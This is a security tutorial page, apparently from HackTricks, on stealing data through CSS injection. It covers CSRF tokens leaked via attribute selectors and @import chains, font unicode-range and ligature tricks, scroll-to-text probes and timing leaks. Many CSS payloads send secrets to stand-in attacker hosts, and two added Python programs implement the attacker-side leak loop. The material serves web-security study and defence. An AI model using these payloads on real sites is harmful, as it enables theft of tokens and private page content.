# CSS Injection

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
**Try Hard Security Group**

<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

***

## CSS Injection

### Attribute Selector

CSS selectors are crafted to match the `name` and `value` attributes of an `input` element. If the `value` attribute of the `input` element starts with a specific character, a predefined external resource is loaded:

```css
input[name=csrf][value^=a]{
    background-image: url(https://attacker.com/exfil/a);
}
input[name=csrf][value^=b]{
    background-image: url(https://attacker.com/exfil/b);
}
/* ... */
input[name=csrf][value^=9]{
    background-image: url(https://attacker.com/exfil/9);
}
```
However, this approach hits a limitation with hidden input elements (`type="hidden"`): hidden elements are not rendered, so their background image is never loaded.

#### Bypass for Hidden Elements

To get around this limitation, you can target a subsequent sibling element using the general sibling combinator `~`. The CSS rule then applies to every sibling that follows the hidden input element, causing the background image to be loaded by a rendered element:

```css
input[name=csrf][value^=csrF] ~ * {
    background-image: url(https://attacker.com/exfil/csrF);
}
```
#### Prerequisites for CSS Injection

For the CSS injection technique to be effective, certain conditions must be met:

1. **Payload length**: The CSS injection vector must support payloads long enough to hold the crafted selectors (one rule per candidate character).
2. **CSS re-evaluation**: You need a way to load the page again with a new payload for each round (for example by framing it), since every round leaks only one more character.
3. **External resources**: The technique assumes the ability to load externally hosted images. This may be blocked by the site's Content Security Policy (CSP), e.g. a restrictive `img-src`.

### Blind Attribute Selector

As [**explained in this post**](https://portswigger.net/research/blind-css-exfiltration), it is possible to combine the **`:has`** and **`:not`** selectors to identify content even from blind elements. This is very useful when you have no idea what is inside the web page loading the CSS injection.\
It is also possible to use those selectors to extract information from several blocks of the same type, such as:

```html
<style>
/* Fires when some input OTHER than the already-known "mytoken" has a name
   starting with "m". The :not() has to be applied to the input inside :has();
   writing html:not(input[name="mytoken"]) would always be true because <html>
   is never an input, and the rule would fire for "mytoken" as well. */
html:has(input[name^="m"]:not([name="mytoken"])) {
    background:url(/m);
}
</style>
<input name=mytoken value=1337>
<input name=myname value=gareth>
```

Combining this with the **@import technique** below, it is possible to exfiltrate a lot of information via CSS injection from blind pages with [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.**

### @import

The previous technique has some drawbacks; check the prerequisites. You need to be able to **send multiple links to the victim**, or you need to be able to **iframe the page vulnerable to CSS injection**.

However, there is another clever technique that uses **CSS `@import`** to improve the quality of the technique.

This was first shown by [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) and it works like this:

Instead of loading the same page over and over again with dozens of different payloads each time (as in the previous technique), we are going to **load the page only once, and only with an import to the attacker's server** (this is the payload to send to the victim):

```css
@import url('//attacker.com:5001/start?');
```

1. The import is going to **receive a CSS script** from the attacker, and the **browser is going to load it**.
2. The first part of the CSS script the attacker sends is **another `@import` to the attacker's server again**.
3. The attacker's server **does not respond to this request yet**: it waits until some characters have been leaked and only then answers this import with the payload that leaks the next ones.
4. The second and bigger part of the payload is an **attribute selector leakage payload**.
5. This sends to the attacker's server the **first character of the secret and the last one**.
6. Once the attacker's server has received the **first and last characters of the secret**, it **responds to the import requested in step 2**.
7. The response is exactly the same as **steps 2, 3 and 4**, but this time it tries to **find the second character of the secret and then the penultimate one**.

The attacker repeats this loop **until the whole secret has been leaked**.

You can find the original [**Pepe Vila's code to exploit this here**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) or you can find almost the [**same code but commented here**.](./#css-injection)

{% hint style="info" %}
The script tries to discover 2 characters each round (one from the beginning and one from the end) because the attribute selector allows things like:

```css
/* value^= to match the beginning of the value */
input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}
/* value$= to match the end of the value */
input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}
```

This lets the script leak the secret twice as fast.
{% endhint %}

{% hint style="warning" %}
Sometimes the script **doesn't detect correctly that the discovered prefix + suffix is already the full flag** and it keeps going forward (in the prefix) and backwards (in the suffix) until at some point it hangs.\
Don't worry, just check the **output**, because **you can see the flag there**.
{% endhint %}
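The following is an added example, not code from the original page, from Pepe Vila's gist or from the HackTricks repo. It covers the attribute-selector, the `:has()` and the `@import` sections above in one place: `build_css` emits one round of the prefix/suffix payload (starting with the `@import` the server will hold back), `Exfil` keeps the attacker-side state, and `simulate_browser` stands in for the victim's browser by evaluating the `^=`/`$=` selectors against the input value, so the whole loop can be run offline. Assumptions, all hypothetical: the attacker origin is `https://attacker.example`, the leaked value is in `<input name="csrf" value="...">`, the token alphabet is lowercase hex and its length is known. The matching rules set custom properties on `<html>` via `:has()` (so hidden inputs work without the `~ *` trick) and `<body>` consumes both properties in one `background-image` list, so a prefix hit and a suffix hit in the same round are both fetched.

```python
"""Added example: one round of the @import-chained attribute-selector leak,
with the browser simulated so the loop can be exercised offline."""
import re
from urllib.parse import parse_qs, quote, urlsplit

ATTACKER = "https://attacker.example"   # assumed (hypothetical) attacker origin
CHARSET = "0123456789abcdef"            # assumed token alphabet
INPUT_NAME = "csrf"                     # assumed name of the leaked input


def build_css(prefix: str, suffix: str, round_no: int,
              charset: str = CHARSET) -> str:
    """Payload for one round. For every candidate char c, one rule matches
    value^=prefix+c and another matches value$=c+suffix. The leading @import
    is the request the attacker's server answers only after this round's
    leaks have arrived, and its response is the next round's payload."""
    lines = [f"@import url({ATTACKER}/next?round={round_no});"]
    for c in charset:
        pre, post = prefix + c, c + suffix
        lines.append(
            f'html:has(input[name="{INPUT_NAME}"][value^="{pre}"])'
            f"{{--pre:url({ATTACKER}/leak?pre={quote(pre, safe='')})}}")
        lines.append(
            f'html:has(input[name="{INPUT_NAME}"][value$="{post}"])'
            f"{{--post:url({ATTACKER}/leak?post={quote(post, safe='')})}}")
    # <html> custom properties inherit into <body>; unset ones fall back to none.
    lines.append("body{background-image:var(--pre,none),var(--post,none)}")
    return "\n".join(lines)


# Toy stand-in for the browser: evaluate the ^= / $= selectors in the generated
# CSS against the input's value and return the URLs a browser would fetch.
_RULE = re.compile(r'\[value(\^|\$)="([^"]*)"\]\)\{--(?:pre|post):url\(([^)]*)\)\}')


def simulate_browser(css: str, value: str) -> list[str]:
    hits = []
    for op, needle, url in _RULE.findall(css):
        if (op == "^" and value.startswith(needle)) or \
           (op == "$" and value.endswith(needle)):
            hits.append(url)
    return hits


class Exfil:
    """Attacker-side state: prefix and suffix grow one char per round."""

    def __init__(self, length: int, charset: str = CHARSET):
        self.length, self.charset = length, charset
        self.prefix, self.suffix, self.round = "", "", 0

    def next_css(self) -> str:
        """Body served for /start and, later, for each held-back /next."""
        self.round += 1
        return build_css(self.prefix, self.suffix, self.round, self.charset)

    def on_leak(self, url: str) -> None:
        """Handler for the /leak?pre=... and /leak?post=... callbacks."""
        q = parse_qs(urlsplit(url).query)
        if "pre" in q:
            self.prefix = q["pre"][0]
        if "post" in q:
            self.suffix = q["post"][0]

    def done(self) -> bool:
        return len(self.prefix) + len(self.suffix) >= self.length

    def secret(self) -> str:
        # Prefix and suffix overlap once they meet in the middle (odd lengths).
        overlap = len(self.prefix) + len(self.suffix) - self.length
        if overlap > 0 and self.prefix[-overlap:] != self.suffix[:overlap]:
            raise ValueError("prefix and suffix disagree; wrong length?")
        return self.prefix + self.suffix[max(overlap, 0):]


def run(secret: str, charset: str = CHARSET) -> tuple[str, int]:
    """Drive the loop against a simulated victim; returns (secret, rounds)."""
    ex = Exfil(len(secret), charset)
    while not ex.done():
        hits = simulate_browser(ex.next_css(), secret)
        if not hits:  # a char outside the charset: the real loop would hang
            raise RuntimeError(f"no selector matched in round {ex.round}")
        for url in hits:
            ex.on_leak(url)
    return ex.secret(), ex.round


if __name__ == "__main__":
    print(build_css("de", "ef", 3))
    print(run("deadbeef"))
```

In a real deployment `Exfil.next_css` is what the attacker's HTTP server returns for `/start` and for each pending `/next` request, and `Exfil.on_leak` is called from the `/leak` handler; the server must keep the `/next` connection open until both leaks of the current round have been seen. Each round shortens the unknown part by two characters, so a 32-character token needs 16 rounds instead of 32.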
### Other selectors

Other ways to reach parts of the DOM with **CSS selectors**:

* **`.class-to-search:nth-child(2)`**: matches an element with the class "class-to-search" that is the **second child of its parent** (note that this is not the second element with that class in the document).
* The **`:empty`** selector (elements with no children): used for example in [**this writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:**

```css
[role^="img"][aria-label="1"]:empty { background-image: url("YOUR_SERVER_URL?1"); }
```

### Error-based XS-Search

**References:** [CSS based Attack: Abusing unicode-range of @font-face](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [Error-Based XS-Search PoC by @terjanq](https://twitter.com/terjanq/status/1180477124861407234)

The overall intention is to **use a custom font from a controlled endpoint** and ensure that **the text (in this case, 'A') is rendered with this font only if the specified resource (`favicon.ico`) cannot be loaded**.

```html
<!DOCTYPE html>
<html>
<head>
    <style>
        @font-face{
            font-family: poc;
            src: url(http://attacker.com/?leak);
            unicode-range:U+0041;
        }
        #poc0{
            font-family: 'poc';
        }
    </style>
</head>
<body>
    <object id="poc0" data="http://192.168.0.1/favicon.ico">A</object>
</body>
</html>
```
1. **Custom font usage**:
- A custom font is defined with the `@font-face` rule inside a `<style>` tag in the `<head>` section.
- The font is named `poc` and is fetched from an external endpoint (`http://attacker.com/?leak`).
- The `unicode-range` property is set to `U+0041`, targeting the single Unicode character 'A'.
2. **Object element with fallback text**:
- An `<object>` element with `id="poc0"` is placed in the `<body>` section. This element tries to load a resource from `http://192.168.0.1/favicon.ico`.
- The `font-family` for this element is set to `'poc'`, as defined in the `<style>` section.
- If the resource (`favicon.ico`) fails to load, the fallback content (the letter 'A') inside the `<object>` tag is displayed.
- Only then is the 'A' rendered with the custom font `poc`, and only then does the browser request the font from the attacker's endpoint. The font request is therefore the error signal: it happens only when the probed resource failed to load.

### Styling Scroll-to-Text Fragment

The `:target` pseudo-class matches the element targeted by the URL fragment, and, as described in the report referenced below, a Scroll-to-Text Fragment (`#:~:text=...`) makes the element containing the matched text the target. A rule like the following can therefore be used to detect whether a given string is present on the page:

```css
:target::before { content : url(target.png) }
```

In such a scenario, if the text "Administrator" is present on the page, the resource `target.png` is requested from the server, indicating the presence of the text. An instance of this attack can be carried out through a specially crafted URL that embeds the injected CSS alongside a Scroll-to-Text Fragment:

```
http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator
```

Here, the attack uses an HTML injection to deliver the CSS code, targeting the specific text "Administrator" through the Scroll-to-Text Fragment (`#:~:text=Administrator`). If the text is found, the indicated resource is loaded, inadvertently signalling its presence to the attacker.

For mitigation, the following points should be considered:

1. **Constrained STTF matching**: Scroll-to-Text Fragment (STTF) is designed to match only words or sentences, which limits its capability to leak arbitrary secrets or tokens.
2. **Restriction to top-level browsing contexts**: STTF operates solely in top-level browsing contexts and does not function within iframes, making any exploitation attempt more noticeable to the user.
3. **Necessity of user activation**: STTF requires a user-activation gesture to operate, meaning exploitation is only feasible through user-initiated navigations. This requirement considerably reduces the risk of attacks being automated without user interaction. However, the author of the blog post points out specific conditions and bypasses (e.g., social engineering, interaction with prevalent browser extensions) that might make the attack easier to automate.

Awareness of these mechanisms and potential vulnerabilities is key to maintaining web security and defending against such exploitation tactics.

For more information check the original report: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)

You can check an [**exploit using this technique for a CTF here**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).

### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>

You can specify **external fonts for specific unicode values** that will only be **fetched if those unicode values are present** on the page. For example:

```html
<style>
@font-face{
    font-family:poc;
    src: url(http://attacker.example.com/?A); /* fetched */
    unicode-range:U+0041;
}
@font-face{
    font-family:poc;
    src: url(http://attacker.example.com/?B); /* fetched too */
    unicode-range:U+0042;
}
@font-face{
    font-family:poc;
    src: url(http://attacker.example.com/?C); /* not fetched */
    unicode-range:U+0043;
}
#sensitive-information{
    font-family:poc;
}
</style>
<p id="sensitive-information">AB</p>
```
### Text node exfiltration (I): ligatures <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>

**Reference:** [Wykradanie danych w świetnym stylu czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)

The technique described extracts text from a node by exploiting font ligatures and observing changes in width. The process involves several steps:

1. **Creation of custom fonts**:
- SVG fonts are crafted with glyphs carrying a `horiz-adv-x` attribute, which gives a very large width to the glyph representing a two-character sequence.
- Example SVG glyph: `<glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>`, where "XY" denotes the two-character sequence.
- These fonts are then converted to woff format using fontforge.

2. **Detection of width changes**:
- CSS is used to ensure that the text does not wrap (`white-space: nowrap`) and to customize the scrollbar style.
- The appearance of a horizontal scrollbar, styled distinctly, acts as an indicator (oracle) that a specific ligature, and hence a specific character sequence, is present in the text.
- The CSS involved:
```css
body { white-space: nowrap; }
body::-webkit-scrollbar { background: blue; }
body::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); }
```

3. **Exploit process**:
- **Step 1**: Fonts are created for pairs of characters with a substantial width.
- **Step 2**: A CSS-based trick is used to detect when the large-width glyph (the ligature for a character pair) is rendered, which indicates the presence of that character sequence.
- **Step 3**: Once a ligature is detected, new glyphs representing three-character sequences are generated, incorporating the detected pair and adding a preceding or succeeding character.
- **Step 4**: Detection of the three-character ligature is carried out.
- **Step 5**: The process repeats, progressively revealing the entire text.

4. **Optimization**:
- The current initialization method using `<meta refresh=...` is not optimal.
- A more efficient approach could involve the CSS `@import` trick, improving the exploit's performance.
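The following is an added example, not code from the original page or from the sekurak article. It generates the SVG ligature font and the probe stylesheet for one candidate sequence, and implements the pair-to-triple extension search of steps 1 to 5 against an oracle. Assumptions, all hypothetical: fonts are served from `https://attacker.example`, the text is made of lowercase hex characters, and the scrollbar oracle is modelled as `seq in text` (in the real attack every oracle call is one font/CSS round trip whose answer is whether `/leak?seq=...` was requested). Converting the SVG font to WOFF with fontforge is left out; the search logic is what the example demonstrates.

```python
"""Added example: SVG ligature font + probe CSS, and the breadth-first
sequence extension used to recover a text node through the ligature oracle."""
from urllib.parse import quote
from xml.sax.saxutils import escape

ATTACKER = "https://attacker.example"   # assumed (hypothetical) attacker origin
CHARSET = "0123456789abcdef"            # assumed alphabet of the text node


def svg_ligature_font(seq: str, family: str = "leak") -> str:
    """SVG font whose only glyph is a ligature for `seq` with a huge advance
    width. Every other character maps to a zero-width missing glyph, so the
    line only overflows horizontally when `seq` occurs in the text."""
    return (
        '<svg xmlns="http://www.w3.org/2000/svg"><defs>'
        f'<font id="{family}" horiz-adv-x="0">'
        f'<font-face font-family="{family}" units-per-em="1000"/>'
        '<missing-glyph horiz-adv-x="0" d=""/>'
        f'<glyph unicode="{escape(seq, {chr(34): "&quot;"})}" '
        'horiz-adv-x="8000" d="M1 0z"/>'
        "</font></defs></svg>"
    )


def probe_css(seq: str, target: str = "body") -> str:
    """Stylesheet for one query: apply the ligature font (assumed to have been
    converted to WOFF and served under /font/), forbid wrapping and turn the
    horizontal scrollbar into the exfiltration channel."""
    font_url = f"{ATTACKER}/font/{quote(seq, safe='')}.woff"
    leak_url = f"{ATTACKER}/leak?seq={quote(seq, safe='')}"
    return "\n".join([
        f"@font-face{{font-family:leak;src:url({font_url});}}",
        f"{target}{{font-family:leak;white-space:nowrap;}}",
        f"{target}::-webkit-scrollbar{{background:blue;}}",
        f"{target}::-webkit-scrollbar:horizontal{{background:url({leak_url});}}",
    ])


def recover(oracle, charset: str = CHARSET, max_len: int = 64):
    """Breadth-first extension: start from every 2-char sequence the oracle
    confirms, then keep prepending/appending one char while the oracle still
    confirms. Returns (maximal sequences found, number of distinct queries).
    Each distinct query corresponds to one font served in the real attack."""
    cache: dict[str, bool] = {}

    def ask(seq: str) -> bool:
        if seq not in cache:            # never probe the same sequence twice
            cache[seq] = bool(oracle(seq))
        return cache[seq]

    frontier = {a + b for a in charset for b in charset if ask(a + b)}
    maximal: set[str] = set()
    while frontier:
        nxt: set[str] = set()
        for seq in frontier:
            grown = {seq + c for c in charset} | {c + seq for c in charset}
            hits = {g for g in grown if len(g) <= max_len and ask(g)}
            if hits:
                nxt |= hits
            else:                        # cannot be extended: a maximal run
                maximal.add(seq)
        frontier = nxt
    return maximal, len(cache)


if __name__ == "__main__":
    print(svg_ligature_font("de"))
    print(probe_css("de"))
    # Constructed sample text standing in for the victim's text node.
    print(recover(lambda s: s in "deadbeef"))
```

The oracle cost is what makes this slow: the first round alone needs one font per pair in the alphabet (256 for hex), and every confirmed sequence costs another 2 × |alphabet| probes, which is why the article suggests driving it with `@import` rather than `<meta refresh>`. Characters outside the alphabet split the text into separate maximal runs, e.g. `ab-cd` is recovered as `{"ab", "cd"}`.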

### Text node exfiltration (II): leaking the charset with a default font (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>

**Reference:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)

This trick was released in this [**Slackers thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with_single\_css\_injection/). The charset used in a text node can be leaked **using the default fonts** installed in the browser: no external -or custom- fonts are needed.

The concept revolves around using an animation to incrementally expand the width of a `div`, allowing one character at a time to move from the 'suffix' part of the text to the 'prefix' part, effectively splitting the text into two sections:

1. **Prefix**: The first line.
2. **Suffix**: The following line(s).

The transition stages of the characters would look like this:

**C**\
ADB
**CA**\
DB
**CAD**\
B
**CADB**

During this transition, the **unicode-range trick** is used to identify each new character as it joins the prefix. This is achieved by switching the font to Comic Sans, which is notably taller than the default font, thereby triggering a vertical scrollbar. The appearance of this scrollbar indirectly reveals the presence of a new character in the prefix.

Although this method allows the detection of unique characters as they appear, it does not tell which character is repeated, only that a repetition has occurred.

{% hint style="info" %}
Basically, the **unicode-range is used to detect a char**, but as we don't want to load an external font, we need to find another way.\
When the **char** is **found**, it's **given** the **pre-installed Comic Sans font**, which **makes** the char **taller** and **triggers a scrollbar** that will **leak the found char**.
{% endhint %}

Check this code extracted from the PoC:

```css
/* comic sans is high (lol) and causes a vertical overflow */
@font-face{font-family:has_A;src:local('Comic Sans MS');unicode-range:U+41;font-style:monospace;}
@font-face{font-family:has_B;src:local('Comic Sans MS');unicode-range:U+42;font-style:monospace;}
@font-face{font-family:has_C;src:local('Comic Sans MS');unicode-range:U+43;font-style:monospace;}
@font-face{font-family:has_D;src:local('Comic Sans MS');unicode-range:U+44;font-style:monospace;}
@font-face{font-family:has_E;src:local('Comic Sans MS');unicode-range:U+45;font-style:monospace;}
@font-face{font-family:has_F;src:local('Comic Sans MS');unicode-range:U+46;font-style:monospace;}
@font-face{font-family:has_G;src:local('Comic Sans MS');unicode-range:U+47;font-style:monospace;}
@font-face{font-family:has_H;src:local('Comic Sans MS');unicode-range:U+48;font-style:monospace;}
@font-face{font-family:has_I;src:local('Comic Sans MS');unicode-range:U+49;font-style:monospace;}
@font-face{font-family:has_J;src:local('Comic Sans MS');unicode-range:U+4a;font-style:monospace;}
@font-face{font-family:has_K;src:local('Comic Sans MS');unicode-range:U+4b;font-style:monospace;}
@font-face{font-family:has_L;src:local('Comic Sans MS');unicode-range:U+4c;font-style:monospace;}
@font-face{font-family:has_M;src:local('Comic Sans MS');unicode-range:U+4d;font-style:monospace;}
@font-face{font-family:has_N;src:local('Comic Sans MS');unicode-range:U+4e;font-style:monospace;}
@font-face{font-family:has_O;src:local('Comic Sans MS');unicode-range:U+4f;font-style:monospace;}
@font-face{font-family:has_P;src:local('Comic Sans MS');unicode-range:U+50;font-style:monospace;}
@font-face{font-family:has_Q;src:local('Comic Sans MS');unicode-range:U+51;font-style:monospace;}
@font-face{font-family:has_R;src:local('Comic Sans MS');unicode-range:U+52;font-style:monospace;}
@font-face{font-family:has_S;src:local('Comic Sans MS');unicode-range:U+53;font-style:monospace;}
@font-face{font-family:has_T;src:local('Comic Sans MS');unicode-range:U+54;font-style:monospace;}
@font-face{font-family:has_U;src:local('Comic Sans MS');unicode-range:U+55;font-style:monospace;}
@font-face{font-family:has_V;src:local('Comic Sans MS');unicode-range:U+56;font-style:monospace;}
@font-face{font-family:has_W;src:local('Comic Sans MS');unicode-range:U+57;font-style:monospace;}
@font-face{font-family:has_X;src:local('Comic Sans MS');unicode-range:U+58;font-style:monospace;}
@font-face{font-family:has_Y;src:local('Comic Sans MS');unicode-range:U+59;font-style:monospace;}
@font-face{font-family:has_Z;src:local('Comic Sans MS');unicode-range:U+5a;font-style:monospace;}
@font-face{font-family:has_0;src:local('Comic Sans MS');unicode-range:U+30;font-style:monospace;}
@font-face{font-family:has_1;src:local('Comic Sans MS');unicode-range:U+31;font-style:monospace;}
@font-face{font-family:has_2;src:local('Comic Sans MS');unicode-range:U+32;font-style:monospace;}
@font-face{font-family:has_3;src:local('Comic Sans MS');unicode-range:U+33;font-style:monospace;}
@font-face{font-family:has_4;src:local('Comic Sans MS');unicode-range:U+34;font-style:monospace;}
@font-face{font-family:has_5;src:local('Comic Sans MS');unicode-range:U+35;font-style:monospace;}
@font-face{font-family:has_6;src:local('Comic Sans MS');unicode-range:U+36;font-style:monospace;}
@font-face{font-family:has_7;src:local('Comic Sans MS');unicode-range:U+37;font-style:monospace;}
@font-face{font-family:has_8;src:local('Comic Sans MS');unicode-range:U+38;font-style:monospace;}
@font-face{font-family:has_9;src:local('Comic Sans MS');unicode-range:U+39;font-style:monospace;}
@font-face{font-family:rest;src: local('Courier New');font-style:monospace;unicode-range:U+0-10FFFF}

div.leak {
    overflow-y: auto; /* leak channel */
    overflow-x: hidden; /* remove false positives */
    height: 40px; /* comic sans capitals exceed this height */
    font-size: 0px; /* make suffix invisible */
    letter-spacing: 0px; /* separation */
    word-break: break-all; /* small width split words in lines */
    font-family: rest; /* default */
    background: grey; /* default */
    width: 0px; /* initial value */
    animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
    animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
}

div.leak::first-line{
    font-size: 30px; /* prefix is visible in first line */
    text-transform: uppercase; /* only capital letters leak */
}

/* iterate over all chars */
@keyframes trychar {
    0% { font-family: rest; } /* delay for width change */
    5% { font-family: has_A, rest; --leak: url(?a); }
    6% { font-family: rest; }
    10% { font-family: has_B, rest; --leak: url(?b); }
    11% { font-family: rest; }
    15% { font-family: has_C, rest; --leak: url(?c); }
    16% { font-family: rest }
    20% { font-family: has_D, rest; --leak: url(?d); }
    21% { font-family: rest; }
    25% { font-family: has_E, rest; --leak: url(?e); }
    26% { font-family: rest; }
    30% { font-family: has_F, rest; --leak: url(?f); }
    31% { font-family: rest; }
    35% { font-family: has_G, rest; --leak: url(?g); }
    36% { font-family: rest; }
    40% { font-family: has_H, rest; --leak: url(?h); }
    41% { font-family: rest }
    45% { font-family: has_I, rest; --leak: url(?i); }
    46% { font-family: rest; }
    50% { font-family: has_J, rest; --leak: url(?j); }
    51% { font-family: rest; }
    55% { font-family: has_K, rest; --leak: url(?k); }
    56% { font-family: rest; }
    60% { font-family: has_L, rest; --leak: url(?l); }
    61% { font-family: rest; }
    65% { font-family: has_M, rest; --leak: url(?m); }
    66% { font-family: rest; }
    70% { font-family: has_N, rest; --leak: url(?n); }
    71% { font-family: rest; }
    75% { font-family: has_O, rest; --leak: url(?o); }
    76% { font-family: rest; }
    80% { font-family: has_P, rest; --leak: url(?p); }
    81% { font-family: rest; }
    85% { font-family: has_Q, rest; --leak: url(?q); }
    86% { font-family: rest; }
    90% { font-family: has_R, rest; --leak: url(?r); }
    91% { font-family: rest; }
    95% { font-family: has_S, rest; --leak: url(?s); }
    96% { font-family: rest; }
}

/* increase width char by char, i.e. add new char to prefix
   (one keyframe per 1% step, each step adds 20px = one character) */
@keyframes loop {
    0% { width: 0px }
    1% { width: 20px }
    2% { width: 40px }
    3% { width: 60px }
    4% { width: 80px }
    5% { width: 100px }
    6% { width: 120px }
    7% { width: 140px }
    8% { width: 0px }
}

div::-webkit-scrollbar {
    background: blue;
}

/* side channel */
div::-webkit-scrollbar:vertical {
    background: blue var(--leak);
}
```
### Text node exfiltration (III): leaking the charset by cache timing (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>

**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)

In this case we could try to leak whether a char is in the text by loading a fake font from the same origin:

```css
@font-face {
    font-family: "A1";
    src: url(/static/bootstrap.min.css?q=1);
    unicode-range: U+0041;
}
```

If there is a match, the **font will be loaded from `/static/bootstrap.min.css?q=1`**. Although it won't load successfully as a font, the **browser should cache the response**, and even if there is no cache, there is the **304 Not Modified** mechanism, so the **response should be faster** than for other resources.

However, if the time difference between the cached response and the non-cached one isn't big enough, this won't be useful. For example, the author mentioned: "However, after testing, I found that the first problem is that the speed isn't that different, and the second problem is that the bot uses the `disk-cache-size=1` flag, which is really thoughtful."

### Text node exfiltration (IV): leaking the charset by timing the loading of hundreds of local "fonts" (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>

**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)

In this case you can make the **CSS load hundreds of fake fonts** from the same origin when a match occurs. This way you can **measure the time** it takes and find out whether a char appears or not with something like:

```css
@font-face {
    font-family: "A1";
    src: url(/static/bootstrap.min.css?q=1),
         url(/static/bootstrap.min.css?q=2),
         ....
         url(/static/bootstrap.min.css?q=500);
    unicode-range: U+0041;
}
```

And the code of the bot looks like this:

```python
import time
from selenium.webdriver.support.ui import WebDriverWait

# `browser` is the Selenium WebDriver instance and `url` the page to visit
browser.get(url)
WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
time.sleep(30)
```

So, if the font doesn't match, the response time when visiting the bot is expected to be approximately 30 seconds. However, if there is a font match, many requests are sent to retrieve the font, keeping the network busy. As a result, it takes longer to satisfy the stop condition and receive the response. The response time can therefore be used as an indicator of whether there is a font match.

## References

* [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
* [https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b](https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b)
* [https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d](https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d)
* [https://x-c3ll.github.io/posts/CSS-Injection-Primitives/](https://x-c3ll.github.io/posts/CSS-Injection-Primitives/)